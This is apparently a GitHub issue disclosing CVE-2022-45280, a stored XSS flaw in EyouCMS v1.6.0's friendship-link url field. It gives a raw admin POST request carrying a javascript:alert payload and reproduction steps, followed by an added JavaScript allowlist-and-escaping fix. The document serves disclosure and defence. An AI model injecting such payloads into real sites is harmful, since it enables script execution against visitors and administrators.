CVE-2022-45280: Stored cross-site scripting (XSS) exists in EyouCMS v1.6.0 · Issue #32 · weng-xianhu/eyoucms
A cross-site scripting (XSS) vulnerability in the Url parameter in /login.php of EyouCMS v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
name: EyouCMS
version: EyouCMS-V1.6.0-UTF8-SP1
Installation package download:
Problematic packets:
POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.23.130:49160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.23.130:49160
Connection: close
Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload=

typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=
Vulnerability reproduction
1. Log in to the admin backend and click "SEO module" -> "friendship link" -> "add link".
2. Enter the payload javascript:alert(11) and submit.
3. After submission, click the link to trigger the XSS.
PS: The vulnerable link is also displayed on the home page and can be triggered by clicking it there.
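
A scheme allowlist for the friendship link's url field, checked on save and again on render, closes the hole shown in the request above. This is an added example, not EyouCMS code: it is written in JavaScript so the check uses the same URL parser a browser applies to href, and the function names and the http/https allowlist are assumptions.

```javascript
// Added example, not EyouCMS code: names and the allowlist are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const ESC = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Request body from the report above (the url field carries the payload).
const REPORTED_BODY =
  "typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=" +
  "&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=";

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESC[c]);
}

// Return the normalized URL when value is an absolute http(s) link, else null.
function safeLinkUrl(value) {
  let parsed;
  try {
    // WHATWG URL parsing is what a browser applies to href: it lowercases the
    // scheme and trims surrounding whitespace before the scheme is compared.
    parsed = new URL(String(value));
  } catch {
    return null; // relative or unparseable input is rejected, not repaired
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Input-side check: decode the form body and validate the url field on save.
function checkLinkSubmission(formBody) {
  const url = safeLinkUrl(new URLSearchParams(formBody).get("url") ?? "");
  return url === null
    ? { accepted: false, reason: "url must be an absolute http(s) link" }
    : { accepted: true, url };
}

// Output-side check: rows stored before the fix may still hold a bad scheme,
// so re-validate when rendering and fall back to plain text.
function renderLink(storedUrl, title) {
  const url = safeLinkUrl(storedUrl);
  const text = escapeHtml(title);
  if (url === null) return `<span>${text}</span>`;
  return `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${text}</a>`;
}

console.log(checkLinkSubmission(REPORTED_BODY)); // rejected
console.log(renderLink("https://example.com/", "Example")); // constructed input
```

Rejecting relative values is a deliberate choice here, since a friendship link points at another site.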